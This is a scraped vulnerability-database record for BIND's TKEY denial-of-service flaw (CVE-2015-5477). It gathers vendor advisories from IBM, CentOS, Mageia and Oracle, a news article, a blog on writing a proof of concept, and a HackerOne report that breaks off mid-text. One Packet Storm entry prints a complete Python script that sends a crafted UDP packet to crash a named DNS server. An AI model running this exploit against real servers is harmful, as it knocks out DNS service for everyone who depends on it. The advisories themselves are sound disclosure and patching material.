"title": "bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-4095", "CVE-2007-2241", "CVE-2007-2925", "CVE-2007-2926", "CVE-2007-6283", "CVE-2008-0122", "CVE-2008-1447", "CVE-2009-0025", "CVE-2009-0696", "CVE-2010-0097", "CVE-2010-0290", "CVE-2011-0414", "CVE-2011-1910", "CVE-2011-2464", "CVE-2012-1033", "CVE-2012-1667", "CVE-2012-3817", "CVE-2012-4244", "CVE-2012-5166", "CVE-2012-5688", "CVE-2012-5689", "CVE-2013-2266", "CVE-2013-4854", "CVE-2014-0591", "CVE-2014-8500", "CVE-2015-1349", "CVE-2015-4620", 
"CVE-2015-5477", "CVE-2015-5722", "CVE-2015-8000", "CVE-2015-8704", "CVE-2016-1285", "CVE-2016-1286", "CVE-2016-2776", "CVE-2016-2848", "CVE-2016-8864", "CVE-2016-9147", "CVE-2017-3136", "CVE-2017-3137", "CVE-2017-3142", "CVE-2017-3143", "CVE-2017-3145", "CVE-2018-5740", "CVE-2018-5741", "CVE-2018-5743", "CVE-2020-8616", "CVE-2020-8617", "CVE-2020-8622", "CVE-2020-8625", "CVE-2021-25215"], "modified": "2022-02-03T00:00:00", "id": "ELSA-2022-9117", "href": "http://linux.oracle.com/errata/ELSA-2022-9117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "aix": [{"lastseen": "2022-01-29T00:44:57", "description": "IBM SECURITY ADVISORY\n\nFirst Issued: Thu Aug 13 10:35:36 CDT 2015\n|Updated: Mon Aug 17 09:11:49 CDT 2015\n|Update: Added AIX 5.3 vulnerability information\n\nThe most recent version of this document is available here:\n\nhttp://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\nhttps://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\nftp://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc\n\n\nSecurity Bulletin: Vulnerability in BIND affects AIX (CVE-2015-5477)\n\n\n===============================================================================\n\nSUMMARY:\n\n BIND vulnerability disclosed by Internet Systems Consortium (ISC) affects\n AIX. AIX has addressed this CVE.\n\n\n===============================================================================\n\nVULNERABILITY DETAILS:\n\n CVEID: CVE-2015-5477\n DESCRIPTION: ISC BIND is vulnerable to a denial of service, caused by an\n error in the handling of TKEY queries. 
By sending specially-crafted\n packets, a remote attacker could exploit this vulnerability to cause a\n REQUIRE assertion failure.\n CVSS Base Score: 7.5\n CVSS Temporal Score: See\n https://exchange.xforce.ibmcloud.com/vulnerabilities/105120 for the\n current score\n CVSS Environmental Score*: Undefined\n CVSS Vector: (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n\n AFFECTED PRODUCTS AND VERSIONS:\n \n| AIX 5.3, 6.1, 7.1\n VIOS 2.2.x\n\n The following AIX fileset levels are vulnerable:\n\n AIX Fileset Lower Level Upper Level KEY\n --------------------------------------------------------\n| bos.net.tcp.client 5.3.12.0 5.3.12.10 key_w_fs \n bos.net.tcp.client 6.1.0.0 6.1.8.19 key_w_fs\n bos.net.tcp.client 6.1.0.0 6.1.9.45 key_w_fs\n bos.net.tcp.client 7.1.0.0 7.1.2.19 key_w_fs\n bos.net.tcp.client 7.1.0.0 7.1.3.45 key_w_fs\n\n\n AIX Fileset (VIOS) Lower Level Upper Level\n ------------------------------------------------------------\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.8.19(2.2.2.6)\n bos.net.tcp.client 6.1.0.0(2.2.0.0) 6.1.9.45(2.2.3.50)\n\n\n Note: to find out whether the affected filesets are installed \n on your systems, refer to the lslpp command found in AIX user's guide.\n\n Example: lslpp -L | grep -i bos.net.tcp.client\n\n\n REMEDIATION:\n\n A. APARS\n \n IBM has assigned the following APARs to this problem:\n\n AIX Level APAR Availability SP KEY\n ---------------------------------------------------\n 6.1.9 IV75692 12/04/15 SP6 key_w_apar\n 7.1.3 IV75693 2/26/16 SP6 key_w_apar\n\n Subscribe to the APARs here:\n\n http://www.ibm.com/support/docview.wss?uid=isg1IV75692\n http://www.ibm.com/support/docview.wss?uid=isg1IV75693\n\n By subscribing, you will receive periodic email alerting you\n to the status of the APAR, and a link to download the fix once\n it becomes available.\n\n B. FIXES\n\n Fixes are available. 
The fixes can be downloaded via ftp or http\n from:\n\n ftp://aix.software.ibm.com/aix/efixes/security/bind9_fix8.tar\n http://aix.software.ibm.com/aix/efixes/security/bind9_fix8.tar\n https://aix.software.ibm.com/aix/efixes/security/bind9_fix8.tar \n\n The link above is to a tar file containing this signed\n advisory, fix packages, and OpenSSL signatures for each package.\n The fixes below include prerequisite checking. This will\n enforce the correct mapping between the fixes and AIX\n Technology Levels.\n\n AIX Level Interim Fix (*.Z) KEY\n ------------------------------------------------\n| 5.3.12.9 IV75966s9a.150813.epkg.Z key_w_fix\n 6.1.8.6 IV75694s6a.150803.epkg.Z key_w_fix\n 6.1.9.5 IV75692s5a.150803.epkg.Z key_w_fix\n 7.1.2.6 IV75690s6a.150803.epkg.Z key_w_fix\n 7.1.3.5 IV75693s5a.150803.epkg.Z key_w_fix\n\n\n To extract the fixes from the tar file:\n\n tar xvf bind9_fix8.tar\n cd bind9_fix8\n\n Verify you have retrieved the fixes intact:\n\n The checksums below were generated using the\n \"openssl dgst -sha256 file\" command as the following:\n\n openssl dgst -sha256 filename KEY\n ----------------------------------------------------------------------------------------------------\n| 043af7d6494326d47b3d35a2a1b9785ea7df4b6d6e56282a251d52d5579d67a1 IV75966s9a.150813.epkg.Z key_w_csum\n af10c7895263c219514f1281617c082dbef35ec5076fa6744e3726517eb322dc IV75694s6a.150803.epkg.Z key_w_csum\n c8c76aed365993102386e9a01b825673fe5684e0b549ae72abf6f1fb9cd55fba IV75692s5a.150803.epkg.Z key_w_csum\n e574f9da379cb8eb8709cd7f87243cb44b75cc8462a02144973d4def4b7021c4 IV75690s6a.150803.epkg.Z key_w_csum\n ad3665e58be16caf9b21f75f788431181c3d79b057129bf4da05690c0bed9304 IV75693s5a.150803.epkg.Z key_w_csum\n\n These sums should match exactly. The OpenSSL signatures in the tar\n file and on this advisory can also be used to verify the\n integrity of the fixes. 
If the sums or signatures cannot be\n confirmed, contact IBM AIX Security at\n security-alert@austin.ibm.com and describe the discrepancy.\n \n openssl dgst -sha1 -verify <pubkey_file> -signature <advisory_file>.sig <advisory_file>\n\n openssl dgst -sha1 -verify <pubkey_file> -signature <ifix_file>.sig <ifix_file>\n\n Published advisory OpenSSL signature file location:\n \n http://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc.sig\n https://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc.sig\n ftp://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc.sig \n\n C. FIX AND INTERIM FIX INSTALLATION\n\n IMPORTANT: If possible, it is recommended that a mksysb backup\n of the system be created. Verify it is both bootable and\n readable before proceeding.\n\n To preview a fix installation:\n\n installp -a -d fix_name -p all # where fix_name is the name of the\n # fix package being previewed.\n To install a fix package:\n\n installp -a -d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; however, IBM does fully support them.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\n You should verify applying this configuration change does not cause\n any compatibility issues. If you change the default setting after\n applying the fix, you will expose yourself to the attack described\n above. 
IBM recommends that you review your entire environment to\n identify other areas where you have enabled the Diffie-Hellman\n key-exchange protocol used in TLS and take appropriate mitigation and\n remediation actions.\n\n WORKAROUNDS AND MITIGATIONS:\n\n None.\n\n\n===============================================================================\n\nCONTACT US:\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n\n To view previously issued advisories, please visit:\n\n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n \n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n To obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To obtain the PGP public key that can be used to communicate\n securely with the AIX Security Team via security-alert@austin.ibm.com you\n can either:\n\n A. Download the key from our web page:\n\nhttp://www.ibm.com/systems/resources/systems_p_os_aix_security_pgppubkey.txt\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\n\nREFERENCES:\n \n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2:\n http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n\n\nACKNOWLEDGEMENTS:\n\n None\n\n\nCHANGE HISTORY:\n\n First Issued: Thu Aug 13 10:35:36 CDT 2015\n| Updated: Mon Aug 17 09:11:49 CDT 2015\n| Update: Added AIX 5.3 vulnerability information\n\n\n===============================================================================\n\n*The CVSS Environment Score is customer environment specific and will \nultimately impact the Overall CVSS Score. 
Customers can evaluate the impact \nof this vulnerability in their environments by accessing the links in the \nReference section of this Security Bulletin. \n\nDisclaimer\nAccording to the Forum of Incident Response and Security Teams (FIRST), the \nCommon Vulnerability Scoring System (CVSS) is an \"industry open standard \ndesigned to convey vulnerability severity and help to determine urgency and \npriority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY \nOF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS \nFOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT \nOF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. \n", "cvss3": {}, "published": "2015-08-13T10:35:36", "type": "aix", "title": "Vulnerability in BIND affects AIX,Vulnerability in BIND affects VIOS", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-17T09:11:49", "id": "BIND9_ADVISORY8.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/bind9_advisory8.asc", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "myhack58": [{"lastseen": "2016-11-12T17:51:48", "edition": 2, "description": "On July 28, 2015, a serious denial-of-service vulnerability, CVE-2015-5477, was disclosed in bind9, the world's most widely used DNS server.\n\nA little background: DNS is the service that maps domain names to IP addresses. 
When you visit google.com, your computer asks the DNS server in your neighborhood: what is the IP address of google.com? If a neighbor happens to have visited google.com as well, the DNS server returns the IP directly; otherwise, it asks Google's official DNS server for the IP address of google.com and returns it to you. This neighborhood DNS server is called a recursive DNS; if a recursive DNS goes down, the area it serves cannot access the Internet. Google's official DNS server is called an authoritative DNS; if an authoritative DNS goes down, the sites it serves vanish from the face of the earth.\n\n![](/Article/UploadPic/2015-8/201582165044529.jpg)\n\nDNS recursive queries ([image source](<http://www.technicalinfo.net/papers/Pharming.html>))\n\nHow serious is this vulnerability? Sending a single UDP packet is enough to take down a DNS server. Whether it is a recursive or an authoritative DNS, and regardless of how bind9 is configured, as soon as the bind9 process receives this packet, it immediately throws an exception and terminates the service.\n\nRoy Zhang, the LUG DNS maintainer, learned of this vulnerability from the Debian security notice and quickly applied the patch. I wrote a POC and tested some DNS servers, took down the school's DNS, and reported it to james at the network center, who thanked me; testing showed that the DNS servers of most operators and some smaller public DNS services are also affected by the vulnerability. More than 72 hours have passed since the vulnerability was disclosed, but this serious vulnerability has not yet received enough attention. Along with releasing the [POC](<https://gist.github.com/bojieli/6d4c370643c6b9f64227>) (proof-of-concept exploit code), I would also like to share the process of writing it.\n\n### Where the vulnerability is\n\nTo learn of vulnerabilities promptly, it is recommended to subscribe to the security tracker of the distributions you care about. 
For example, in Debian's [bulletin](<https://security-tracker.debian.org/tracker/CVE-2015-5477>) for this vulnerability, the Source column links to the vulnerability's source, the CVE, and to the security bulletins of other distributions. The description reads:\n\n\nnamed in ISC BIND 9.x before 9.9.7-P2 and 9.10.x before 9.10.2-P3 allows remote attackers to cause a denial of service (REQUIRE assertion failure and daemon exit) via TKEY queries.\n\nThe best way to understand this vulnerability further is to read the source code: what changes the bind9 code made to fix it shows where the bug is. A Google search finds the bind9 source tree on [Gitweb](<https://source.isc.org/cgi-bin/gitweb.cgi?p=bind9.git;a=summary>), and the commit log contains this line:\n\n\n2015-07-14 Mark Andrews add CVE-2015-5477\n\nThis commit is only a note; the real code change comes before it. We can look through the commit log to find the real code change.\n\n![](/Article/UploadPic/2015-8/201582165044286.png)\n\nThe attentive reader may have noticed that the commit date is July 14, 2015, which is half a month ago! Yes, this is how the vulnerability fix and disclosure process works.\n\n1. A vulnerability is reported; at this point only the reporter and the bind9 security team know about it.\n2. bind9 fixes the vulnerability.\n3. \u201cImportant vendors\u201d are notified, including the major distributions and large partner companies.\n4. The vulnerability is publicly released at the negotiated time.\n\nIf you keep an eye on the repositories of some open source software, you will find security vulnerabilities being fixed while almost nothing about them can be found on the web. A few days later, the CVE database entry becomes available, the distributions publish security advisories, and media such as Hacker News begin coverage. 
That is, by the time we learn of a vulnerability through \u201cofficial channels\u201d, it is no longer a 0day, nor even a 1day.\n\n### Disaster from the ASSERTION\n\nBack to business. The fix for this vulnerability is very simple: it just adds the statement `name = NULL;`. The vulnerability description says that an illegal packet causes an assertion to fail and the daemon to exit.\n\nA DNS query is a UDP packet that asks a question; the DNS server responds with a UDP packet that gives the answer. DNS query and response packets share the same format, made up of the question, answer, authority, and additional sections.\n\n![](/Article/UploadPic/2015-8/201582165044643.jpg)\n\nDNS request format (image source)\n\nThe problematic code block is in the dns_tkey_processquery function:\n\n![](/Article/UploadPic/2015-8/201582165046917.png)\n\nThe procedure is as follows:\n\n1. The query name is found in the QUESTION section of the DNS request and stored in qname. For example, when we query google.com, the QUESTION section contains one question, and its name is google.com.\n2. A name matching the query name (qname) is looked up in the ADDITIONAL section of the DNS request and stored in name. For a legitimate TKEY request, this should be a transaction key. The details are not important here; interested readers can see [RFC 2930](<https://tools.ietf.org/html/rfc2930>).\n3. If it is not found in the ADDITIONAL section, the lookup is tried again in the ANSWER section. 
(What were the Win2000 developers thinking? This is obviously a question, yet they put the TKEY into the answer block.)\n", "cvss3": {}, "published": "2015-08-02T00:00:00", "type": "myhack58", "title": "A data packet to eliminate a single server of the DNS vulnerability-vulnerability warning-the black bar safety net", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-02T00:00:00", "href": "http://www.myhack58.com/Article/html/3/62/2015/65275.htm", "id": "MYHACK58:62201565275", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:56:29", "description": "The maintainers of BIND have patched a critical remotely exploitable vulnerability in the DNS software that can be used in a denial-of-service attack. The vulnerability affects all versions of BIND from 9.1.0 through 9.9.7.\n\nThe vulnerability is in the way that BIND handles certain queries related to transaction key records. 
The bug is fixed in BIND versions 9.9.7-P2 and P3.\n\n\u201cAn error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit,\u201d the [advisory](<https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/>) from the Internet Systems Consortium, which maintains BIND, says.\n\n\u201cBoth recursive and authoritative servers are vulnerable to this defect. Additionally, exposure is not prevented by either ACLs or configuration options limiting or denying service because the exploitable code occurs early in the packet handling, before checks enforcing those boundaries.\u201d\n\nBIND is the most widely deployed name server software on the Internet, and the TKEY flaw is an especially problematic one for administrators running name servers, as the ISC says there is no real workaround and defending against the bug can be quite difficult.\n\n\u201cMany of our bugs are limited in scope or affect only users having a particular set of configuration choices. CVE-2015-5477 does not fall into that category. Almost all unpatched BIND servers are potentially vulnerable. We know of no configuration workarounds. Screening the offending packets with firewalls is likely to be difficult or impossible unless those devices understand DNS at a protocol level and may be problematic even then. 
And the fix for this defect is very localized to one specific area of the BIND code,\u201d Michael McNally said in a special [note](<https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/>) on the vulnerability.\n\nMcNally added that there\u2019s a good possibility that practical attacks against CVE-2015-5477 will emerge in short order.\n\n\u201cThe practical effect of this is that this bug is difficult to defend against (except by patching, which is completely effective) and will not be particularly difficult to reverse-engineer. I have already been told by one expert that they have successfully reverse-engineered an attack kit from what has been divulged and from analyzing the code changes, and while I have complete confidence that the individual who told me this is not intending to use his kit in a malicious manner, there are others who will do so who may not be far behind,\u201d McNally said.\n\nThe ISC has released the two new versions to fix the TKEY vulnerability. 
There is also a second security fix in the new versions, though it\u2019s less serious than the TKEY bug.\n\n\u201cOn servers configured to perform DNSSEC validation, an assertion failure could be triggered on answers from a specially configured server,\u201d the [BIND release notes](<https://kb.isc.org/article/AA-01279>) say.\n", "cvss3": {}, "published": "2015-07-29T09:09:28", "type": "threatpost", "title": "Critical Remotely Exploitable Bug Haunts BIND", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-08-04T15:54:09", "id": "THREATPOST:345F6C411E78E96A9B0A921D21729C65", "href": "https://threatpost.com/critical-remotely-exploitable-bug-haunts-bind/114008/", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "mageia": [{"lastseen": "2022-04-18T11:19:34", "description": "An error in the handling of TKEY queries can be exploited by an attacker for use as a denial-of-service vector, as a constructed packet can use the defect to trigger a REQUIRE assertion failure, causing BIND to exit (CVE-2015-5477). 
\n", "cvss3": {}, "published": "2015-07-31T22:46:26", "type": "mageia", "title": "Updated bind package fixes security vulnerability\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-31T22:46:26", "id": "MGASA-2015-0298", "href": "https://advisories.mageia.org/MGASA-2015-0298.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2022-02-27T11:53:12", "description": "**CentOS Errata and Security Advisory** CESA-2015:1514\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. 
After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2015-July/058189.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libbind-devel\nbind-libs\nbind-sdb\nbind-utils\ncaching-nameserver\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:1514", "cvss3": {}, "published": "2015-07-29T02:04:03", "type": "centos", "title": "bind, caching security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T02:04:03", "id": "CESA-2015:1514", "href": "https://lists.centos.org/pipermail/centos-announce/2015-July/058189.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-02-27T11:53:12", "description": "**CentOS Errata and Security Advisory** CESA-2015:1513\n\n\nThe Berkeley Internet Name Domain (BIND) is an implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. 
A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2015-July/058187.html\nhttps://lists.centos.org/pipermail/centos-cr-announce/2015-July/014995.html\n\n**Affected packages:**\nbind\nbind-chroot\nbind-devel\nbind-libs\nbind-libs-lite\nbind-license\nbind-lite-devel\nbind-sdb\nbind-sdb-chroot\nbind-utils\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:1513", "cvss3": {}, "published": "2015-07-29T01:43:33", "type": "centos", "title": "bind security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T01:56:37", "id": "CESA-2015:1513", "href": "https://lists.centos.org/pipermail/centos-announce/2015-July/058187.html", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2022-02-27T11:53:12", "description": "**CentOS Errata and Security Advisory** CESA-2015:1515\n\n\nThe Berkeley Internet Name Domain (BIND) is an 
implementation of the Domain\nName System (DNS) protocols. BIND includes a DNS server (named); a resolver\nlibrary (routines for applications to use when interfacing with DNS); and\ntools for verifying that the DNS server is operating correctly.\n\nA flaw was found in the way BIND handled requests for TKEY DNS resource\nrecords. A remote attacker could use this flaw to make named (functioning\nas an authoritative DNS server or a DNS resolver) exit unexpectedly with an\nassertion failure via a specially crafted DNS request packet.\n(CVE-2015-5477)\n\nRed Hat would like to thank ISC for reporting this issue. Upstream\nacknowledges Jonathan Foote as the original reporter.\n\nAll bind97 users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. After installing the\nupdate, the BIND daemon (named) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2015-July/058188.html\n\n**Affected packages:**\nbind97\nbind97-chroot\nbind97-devel\nbind97-libs\nbind97-utils\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2015:1515", "cvss3": {}, "published": "2015-07-29T02:03:50", "type": "centos", "title": "bind97 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-29T02:03:50", "id": "CESA-2015:1515", "href": "https://lists.centos.org/pipermail/centos-announce/2015-July/058188.html", "cvss": {"score": 7.8, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:15:09", "description": "", "cvss3": {}, "published": "2015-07-31T00:00:00", "type": "packetstorm", "title": "BIND TKEY Query Denial Of Service", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5477"], "modified": "2015-07-31T00:00:00", "id": "PACKETSTORM:132926", "href": "https://packetstormsecurity.com/files/132926/BIND-TKEY-Query-Denial-Of-Service.html", "sourceData": "`#!/usr/bin/python \n# Title: BIND Remote DoS via TKEY queries \n# aka: DNS TKEY Query of Death \n# Author: Lorenzo Corsini <serdat> \n# E-Mail: serdat5[at]gmail[dot]com \n# Twitter: https://twitter.com/serdat5tm \n \n# References: \n# https://kb.isc.org/article/AA-01272 \n# https://www.isc.org/blogs/about-cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/ \n \n# Warning there is no way to use this PoC in a non-desruptive manner. \n# Use with care. I'm not responsible for what you'll do with that \n \nimport socket \nimport sys \n \n#Not randomized. \nDNS_PACKET='\\x04X\\x00\\x80\\x00\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x03xxx\\x00\\x00\\xf9\\x00\\xff\\x03xxx\\x00\\x00\\xf9\\x00\\xff\\x00\\x00\\x00\\x00\\x00%\\x03xxx\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x10\\x00\\x00\\x03xxx\\x00\\x00\\x10\\x00\\xff\\x00\\x00\\x00\\x00\\x00%$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa' \n \ntry: \nHOST=sys.argv[1] \nPORT= 53 \nexcept: \nprint \"Usage: %s host_to_crash\" & sys.argv[0] \nsys.exit(-1) \n \nprint \"Exploiting target at %s\" % HOST \n \ns=socket.socket(socket.AF_INET,socket.SOCK_DGRAM) \ns.sendto(DNS_PACKET,(HOST,PORT)) \ns.close() \n \nprint \"Check Manually if the exploit worked... 
try launching:\" \nprint \"dig @%s CR4SH3D any\" % HOST \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132926/tkey_dos.py.txt", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "hackerone": [{"lastseen": "2018-12-17T15:36:38", "bounty": 0.0, "description": "Hello Team NextCloud,\n\nIn reference report #217381\nI've reported the DDOS attack via DNS Port at OwnCloud..\nAnd it was successfully patched.\n\nBut now same issue I got at\n\n```\nci.nextcloud.com\n```\nProof Of Concept:\nHere it is the nmap result of ci.nextcloud.com\n\nNMap Scan Results:\n```\nStarting Nmap 7.40 ( https://nmap.org ) at 2017-06-08 04:12 PKT\nNmap scan report for ci.nextcloud.com (\u2588\u2588\u2588\u2588\u2588)\nHost is up (0.077s latency).\nrDNS record for \u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588: \u2588\u2588\u2588\u2588\u2588\u2588\u2588\nNot shown: 96 filtered ports\nPORT STATE SERVICE VERSION\n22/tcp open tcpwrapped\n53/tcp open tcpwrapped\n80/tcp open tcpwrapped\n443/tcp open tcpwrapped\n```\nNow here it is the telnet result:\n```\n\u2500\u2500\u257c $telnet\ntelnet> open\n(to) 